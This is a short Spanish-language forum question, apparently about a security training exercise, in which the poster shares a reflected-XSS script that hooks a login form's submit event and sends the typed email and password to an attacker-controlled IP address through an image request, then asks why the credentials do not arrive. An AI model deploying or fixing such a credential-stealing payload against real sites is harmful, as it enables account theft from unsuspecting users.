Estoy tratando de resolver este ejercicio .
El objetivo de esto es "Publicar el nombre de usuario y la contraseña en el servidor controlado por el atacante".
Hay un parámetro url
que toma el servidor y se refleja de nuevo en la página. Que es lo que necesitamos usar como el vector XSS.
Ahora, he escrito un guión como este:
<script type="text/javascript">
function HijackCred() {
var email = document.forms[0].elements[0].value;
var pass = document.forms[0].elements[1].value;
img = document.createElement("img");
img.src = "http://192.168.2.25:8080?" + "email=" + email + "&" + "password=" + pass;
}
document.forms[0].onsubmit = HijackCred;
</script>
La inyección funciona bien ya que puedo ver el script reflejado en la página. Sin embargo, la carga útil del script no envía las credenciales al servidor controlado por el atacante. ¿Alguna sugerencia?